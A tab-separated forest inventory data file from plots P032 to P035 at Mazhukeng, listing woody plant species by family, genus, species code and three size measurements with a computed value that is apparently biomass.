Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7	4.5	3	0.0101721
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3.5	5	1.4	0.00307536
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	4	0.00600364
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	6	4.5	0.00718464
Mazhukeng	1	P032	Moraceae	Ficus	Ficus formosana Maxin.	FICFOR	1.1	1.5	1	0.00010718
Mazhukeng	1	P032	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	1	1	0.3	6.01228e-05
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	4.5	1	0.0101721
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5	3	0.00600364
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4.5	5.5	3.5	0.00541211
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5.5	3	0.00659455
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	2.5	0.0101137
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6	2.2	0.0135042
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	7	5	0.00320825
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	1.9	0.0201917
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	8	3.4	0.0134267
Mazhukeng	1	P032	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	10	2	0.0357834
Mazhukeng	1	P032	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	4	5	2	0.00395057
Mazhukeng	1	P032	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3.5	6	4	0.00368033
Mazhukeng	1	P032	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	6.5	3.5	0.007774
Mazhukeng	1	P032	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	1.6	0.5	0.000350486
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	1	0.1	6.01228e-05
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	1.6	0.4	9.55189e-05
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	1.6	0.5	0.00013446
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	2	1.5	0.000167512
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.1	2.4	1	0.00017028
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2.5	1.2	0.000317142
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2.5	1.5	0.000317142
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.8	0.000543971
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.1	0.000543971
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	16	2.5	1.2	0.0268733
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	2.8	0.7	0.000233333
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1.6	0.000177413
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1.2	0.000177413
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	3	1	0.00024974
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.7	0.000379528
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.8	0.000379528
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	0.8	0.000379528
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.8	3	0.5	0.00122357
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1.6	0.0013926
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.6	0.000441757
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.4	0.000441757
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.6	0.000757716
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3.5	1	0.00278028
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	1.7	0.000503852
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	1.5	0.000503852
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.2	0.000864223
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.6	0.000864223
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	0.3	0.00184878
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1	0.00184878
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	6	4	0.8	0.0067837
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4.5	2	0.000565831
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	4	0.00097053
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	1.3	0.00097053
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	4.5	1.5	0.0014749
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.8	4.5	1	0.0018242
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	2	0.0020762
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	1.5	0.0020762
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	3.5	0.00230323
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	1.8	0.00230323
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3.2	5	1.8	0.00259959
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3.5	5	2.5	0.00307536
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1	0.00395057
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.9	0.00395057
Mazhukeng	1	P033	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	5	3.5	0.00600364
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	1.8	1.3	0.000842002
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	8	3.5	2	0.0102016
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	4	2.5	0.000864223
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3.8	4	2.2	0.00288024
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	4.5	1.2	0.00761816
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.3	6	1.6	0.00167459
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.8	7	3.5	0.00281885
Mazhukeng	1	P033	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	7.5	1.2	0.00895072
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	2.5	1	0.00116368
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	4.5	3	0.00097053
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4.5	2	0.0020762
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	5	1.2	0.00107666
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	6.5	2.5	0.0187703
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4.5	7	2.2	0.00686321
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7.5	4	0.0125998
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	8	2.3	0.00953817
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	8	2.5	0.0134267
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	8.5	5	0.00666259
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	9	4	0.0107114
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	9.5	2.8	0.0212344
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	10	3.2	0.0167271
Mazhukeng	1	P033	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	10	2.5	0.0223347
Mazhukeng	1	P033	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1	0.6	6.01228e-05
Mazhukeng	1	P033	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	1.1	2.2	0.9	0.000156295
Mazhukeng	1	P033	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	1.2	2.5	1.5	0.000208689
Mazhukeng	1	P033	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	1.3	2.8	1.2	0.000271127
Mazhukeng	1	P033	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	1.2	3	2.5	0.00024974
Mazhukeng	1	P033	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	2.6	1	0.000216908
Mazhukeng	1	P033	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	3	1	0.00024974
Mazhukeng	1	P033	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	3.5	0.000235529
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	2.8	0.5	0.00130111
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8	4	0.00953817
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	8.5	6	0.019031
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	2	0.0393034
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	10	3.5	0.0713181
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	12	2.5	0.0853474
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	12	2.5	0.0980737
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	6.5	0.209803
Mazhukeng	1	P033	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	24	14	2	0.313701
Mazhukeng	1	P033	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	20	14	5	0.222849
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	3.5	0.3	0.00422516
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3.2	4	2	0.00208667
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	4.5	1.7	0.00356116
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	6	4.5	0.00128845
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	6	0.1	0.00718464
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.8	7	5.5	0.00281885
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	7	4	0.011772
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	7	5	0.011772
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	8	2	0.0134267
Mazhukeng	1	P033	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7.5	8	1.8	0.0204044
Mazhukeng	1	P033	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	4	3	0.1	0.00238863
Mazhukeng	1	P033	Myrtaceae	Rhodomyrtus	Rhodomyrtus tomentosa	RHOTOM	1.2	2.5	1.2	0.000208689
Mazhukeng	1	P033	Moraceae	Ficus	Ficus hirta Vahl	FICHIR	1.5	3	0.1	0.000379528
Mazhukeng	1	P033	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	4.5	2.2	0.00356116
Mazhukeng	1	P033	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	5.5	3	0.00928302
Mazhukeng	1	P033	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6	2	0.0135042
Mazhukeng	1	P033	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	6	4	0.0263625
Mazhukeng	1	P033	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	6.5	2	0.0234104
Mazhukeng	1	P033	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	7	3.5	0.0431948
Mazhukeng	1	P033	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	9	10	3	0.0357834
Mazhukeng	1	P033	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2	1.2	0.000254566
Mazhukeng	1	P033	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	2	2.5	1.2	0.000543971
Mazhukeng	1	P034	Rubiaceae	Tarenna	Tarenna mollissima (Hook. et Arn.) Rob.	TARMOL	1	2.5	1.5	0.00014825
Mazhukeng	1	P034	Rubiaceae	Tarenna	Tarenna mollissima (Hook. et Arn.) Rob.	TARMOL	1	2.8	1.5	0.000165757
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	1.9	0.6	0.000113136
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2	0.8	0.000118999
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2	0.5	0.00043664
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2.2	1	0.000130711
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.2	1	0.000479616
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.6	1.6	0.000565396
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.2	2.8	1.8	0.000727253
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.2	3	0.6	0.000778392
Mazhukeng	1	P034	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	2	0.0013926
Mazhukeng	1	P034	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	7	5.6	0.0157184
Mazhukeng	1	P034	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	10	5	0.0613767
Mazhukeng	1	P034	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	14	11	6	0.0900186
Mazhukeng	1	P034	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	1.2	2	0.2	0.000167512
Mazhukeng	1	P034	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	5	2.5	0.00845122
Mazhukeng	1	P034	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	7.5	5.5	0.00895072
Mazhukeng	1	P034	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	12	9	2.6	0.0553266
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	3	1.5	0.000650978
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2.5	3	1.8	0.000989284
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2.5	3.5	1.2	0.00115149
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	3.5	0.8	0.00162093
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	4	0.6	0.000864223
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	3	0.00184878
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6	3.5	0.00472771
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	6	3	0.0101137
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6.5	3	0.00511552
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	6.5	3	0.0109433
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	7	1.2	0.0157184
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	7.5	1.7	0.0216115
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	8	4	0.00953817
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8	4.5	0.0230299
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8	6	0.0230299
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	8.5	2	0.0304903
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	9	6	0.0322561
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	10	5	0.0436013
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	11	10	5	0.0521352
Mazhukeng	1	P034	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	12	10	6	0.0613767
Mazhukeng	1	P034	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.1	2.2	0.8	0.000156295
Mazhukeng	1	P034	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.5	1.5	0.4	0.000191753
Mazhukeng	1	P034	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	2	0.6	0.000167512
Mazhukeng	1	P034	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	7	2	0.13463
Mazhukeng	1	P034	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8.5	9	4	0.0289771
Mazhukeng	1	P034	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	24	9	1.5	0.203009
Mazhukeng	1	P034	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	12	3.8	0.0521783
Mazhukeng	1	P034	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	12	3	0.0980737
Mazhukeng	1	P034	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	13	4	0.120778
Mazhukeng	1	P034	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3.5	2	1.6	0.00124721
Mazhukeng	1	P034	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4	2.5	0.000864223
Mazhukeng	1	P034	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4.2	4	3.5	0.00347495
Mazhukeng	1	P034	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.6	5.5	3.5	0.00193441
Mazhukeng	1	P034	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4.5	9	6	0.00879083
Mazhukeng	1	P034	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	1.5	2.2	2	0.000279622
Mazhukeng	1	P034	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	13	6	5	0.0431209
Mazhukeng	1	P034	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	10	7	5.5	0.0306851
Mazhukeng	1	P034	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3.5	3.5	1	0.00216433
Mazhukeng	1	P034	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	3.5	1.6	0.00594767
Mazhukeng	1	P034	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3.5	5	3.2	0.00307536
Mazhukeng	1	P034	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	6.5	1.7	0.0401542
Mazhukeng	1	P034	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	6.5	2	0.0401542
Mazhukeng	1	P034	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	6.5	1.8	0.0466581
Mazhukeng	1	P034	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	14	8	2.2	0.0657824
Mazhukeng	1	P034	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	5	1.8	0.00395057
Mazhukeng	1	P034	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	10	9	2.5	0.0393034
Mazhukeng	1	P035	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2	1	0.000118999
Mazhukeng	1	P035	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.2	1.2	0.000479616
Mazhukeng	1	P035	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2.5	1	0.00014825
Mazhukeng	1	P035	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2.5	1.1	0.000317142
Mazhukeng	1	P035	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	6	10	8	0.0167271
Mazhukeng	1	P035	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2.5	4.5	1.5	0.0014749
Mazhukeng	1	P035	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3.5	5.5	4	0.00337805
Mazhukeng	1	P035	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4.5	7	3	0.00686321
Mazhukeng	1	P035	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.6	1.3	0.3	0.000187973
Mazhukeng	1	P035	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.8	0.6	0.000107269
Mazhukeng	1	P035	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.8	1.8	0.00060821
Mazhukeng	1	P035	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	1	2.4	1.1	0.000142407
Mazhukeng	1	P035	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	2	3	2.4	0.000650978
Mazhukeng	1	P035	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	2	4	2	0.000864223
Mazhukeng	1	P035	Ebenaceae	Diospyros	Diospyros morrisiana Hance	DIOMOR	11	13	5.5	0.0675089
Mazhukeng	1	P035	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.5	2	1.6	0.000254566
Mazhukeng	1	P035	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	2.5	1.7	0.000208689
Mazhukeng	1	P035	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	3	1	0.000177413
Mazhukeng	1	P035	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	2.5	0.000235529
Mazhukeng	1	P035	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	4.5	3.5	0.00097053
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	4.5	3	0.00097053
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	7.5	3.5	0.0168237
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	8.5	6	0.0142529
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	8.5	6	0.0142529
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	8.5	3.5	0.0142529
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	9.5	3.5	0.166679
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	7.5	0.0286909
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	10	9	0.0521352
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	10	6.5	0.145312
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	10.5	8	0.0547018
